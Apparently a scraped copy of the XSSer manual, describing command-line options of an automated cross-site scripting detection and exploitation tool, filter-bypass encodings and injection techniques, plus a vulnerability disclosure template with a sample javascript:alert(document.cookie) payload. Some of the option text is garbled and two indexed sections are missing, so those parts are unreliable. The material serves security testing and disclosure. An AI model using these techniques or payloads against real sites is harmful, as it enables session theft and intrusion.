Beruflich Dokumente
Kultur Dokumente
0.- Index:
===================
1.- Introduction
2.- Options and features
3.- Payloads
4.- Examples of usage
5.- How to XSS report to the Internet
6.- Documentation
7.- Downloads
====================================
1.- Introduction:
===================
Cross Site "Scripter" (aka XSSer), is an automatic -framework- to detect,
exploit and report
XSS vulnerabilities in web-based applications.
It contains several options to try to detect and "bypass" certain filters,
and various special
techniques of code injection.
====================================
2.- Options and features:
===================
xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c
<crawl>]
[Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
*Options*:
--version
show program's version number and exit
-h, --help
show this help message and exit
-s, --statistics
show advanced statistics output results
-v, --verbose
active verbose mode output results
--gtk
launch XSSer GTK Interface (Wizard included!)
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra
special features:
--imx=IMX
create a false image with XSS code embedded
--fla=FLASH
create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to g
et target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL
Enter target(s) to audit
-i READFILE
Read target urls from a file
-d DORK
Process search engine dork results as target url
s
--De=DORK_ENGINE
a,
yahoo, baidu, yandex, youdao, webcrawler, google
, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use l
ike payload to inject code.
-g GETDATA
Enter payload to audit using GET (ex: '/menu.php
?q=')
-p POSTDATA
Enter payload to audit using POST (ex: 'foo=1&ba
r=')
-c CRAWLING
Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLER_WIDTH
Deeping level of crawler: 1-5
--Cl
Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload
(s).
You can choose multiple:
--cookie=COOKIE
Change your HTTP Cookie header
--drop-cookie
Ignore Set-Cookie header from response
--user-agent=AGENT
Change your HTTP User-Agent header (default SPOO
FED)
--referer=REFERER
Use another HTTP Referer header (default NONE)
--xforw
Set your HTTP X-Forwarded-For with random IP val
ues
--xclient
Set your HTTP X-Client-IP with random IP values
--headers=HEADERS
Extra HTTP headers newline separated
--auth-type=ATYPE
HTTP Authentication type (Basic, Digest, GSS, NT
LM)
--auth-cred=ACRED
HTTP Authentication credentials (name:password)
--proxy=PROXY
Use proxy server (tor: http://localhost:8118)
--ignore-proxy
Ignore system default HTTP proxy
--timeout=TIMEOUT
Select your timeout (default 30)
--retries=RETRIES
Retries when the connection timeouts (default 1)
--threads=THREADS
Maximum number of concurrent HTTP requests (defa
ult 5)
--delay=DELAY
Delay in seconds between each HTTP request (defa
ult 0)
--tcp-nodelay
Use the TCP_NODELAY option
--follow-redirects
XSSer will follow server redirection responses (
302)
--follow-limit=FLI
Set how many times XSSer will follow redirection
s
(default 50)
*Checker systems*:
This options are usefull to know if your target(s) have some filters aga
inst XSS attacks,
--Str
Use method String.FromCharCode()
--Une
Use Unescape() function
--Mix
Mix String.FromCharCode() and Unescape()
--Dec
Use Decimal encoding
--Hex
Use Hexadecimal encoding
--Hes
Use Hexadecimal encoding, with semicolons
--Dwo
Encode vectors IP addresses in DWORD
--Doo
Encode vectors IP addresses in Octal
--Cem=CEM
Try -manually- different Character Encoding Muta
tions
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str
,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of
XSS techniques.
You can choose multiple:
--Coo
COO - Cross Site Scripting Cookie injection
--Xsa
XSA - Cross Site Agent Scripting
--Xsr
XSR - Cross Site Referer Scripting
--Dcp
DCP - Data Control Protocol injections
--Dom
DOM - Document Object Model injections
--Ind
IND - HTTP Response Splitting Induced code
--Anchor
ANC - Use Anchor Stealth payloader (DOM shadows!
)
--Phpids
PHP - Exploit PHPIDS bug (0.6.5) to bypass filte
rs
lly--Fr=FINALREMOTE
REMOTE - Insert your final code to inject -remot
elly--Doss
DOSs
DOS
B64
n
--Dos
n
--B64
97)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vuln
erable target(s).
You can select multiple and combine with your final code (except with DC
P code):
--Onm
ONM - Use onMouseMove() event to inject code
--Ifr
IFR - Use <iframe> source tag to inject code
*Miscellaneous*:
--silent
inhibit console output results
--update
check for XSSer latest stable version
--save
output all results directly to template (XSSlist
.dat)
--xml=FILEXML
output 'positives' results to aXML file (--xml f
ilename.xml)
--short=SHORTURLS
display -final code- shortered (tinyurl, is.gd)
--launch
ost/path/code.js" --launch
====================================
5.- How to XSS report to the Internet:
===================
If you want report a XSS vulnerability in a software to the global Interne
t, you can send an email
directly to some open security mailing list.
More common are (of course, there are others):
- Bugtraq:
bugtraq@securityfocus.com
- FD:
full-disclosure@lists.grok.org.uk
If you never sended a security report before, check this template:
---------------- cut here ---------------------------Subject:
<name of software> <version> <== Cross Site <reflected/persistent> Scripti
ng
----1. OVERVIEW
The <name of software> <version> and lower versions were vulnerable to Cro
ss Site Scripting.
2. BACKGROUND
<name of software>
<description of software>
3. VULNERABILITY DESCRIPTION
<description of vulnerability>
- example:
The 'Target' parameter was not properly sanitized after user logs in, whic
h allows attacker
to conduct Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link to a
file which seems to
require authentication. Upon logging in, user will get XSSed.
4. VERSIONS AFFECTED
<version> and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://target.com/index.php?p=/entry/signin&Target=javascript:alert(docume
nt.cookie)//http://
6. SOLUTION
Upgrade to <name of software><version> or higher
7. VENDOR
<name of vendor>: http://vendor.com/
8. CREDIT
This vulnerability was discovered by: <data about researcher>
9. DISCLOSURE TIME-LINE
- example:
2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://researcher.website.org/lab/vulnerability_founded
- XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
- XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
---------------- cut here ---------------------------Is important add to the report the tools that you used in your researching
tasks to discover the vulnerabilities.
For example, you can put another section doing a mention of them, like thi
s:
----------?. TOOLS
This vulnerability was discovered using XSSer Swarm Edition!.
More info: http://xsser.sf.net
----------This info can be very usefull for developers and other researchers of secu
rity tools.
====================================
6.- Documentation:
===================
Slides: XSSer "The Mosquito" - 2011
- http://xsser.sourceforge.net/xsser/XSSer_the_mosquito_2011.pdf
XSS for fun and profit - conference SCG/09 -PDF (184 pages)
+ English Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG0
9_(english).pdf
+ Spanish Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG0
9_(spanish).pdf
URL Generation Schema (an schema about how XSSer injects code)
- http://xsser.sourceforge.net/xsser/url_generation.png
Also, you have some videos about "how to use XSSer" on the Internet.
- http://xsser.blip.tv
====================================
7.- Downloads:
===================
XSSer (official version) can be downloaded from its SourceForge File List
page:
- http://sourceforge.net/projects/xsser/files/.
You can also checkout the latest development version from the XSSer -Subv
ersion- repository:
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
For more details, check the main website:
- http://xsser.sf.net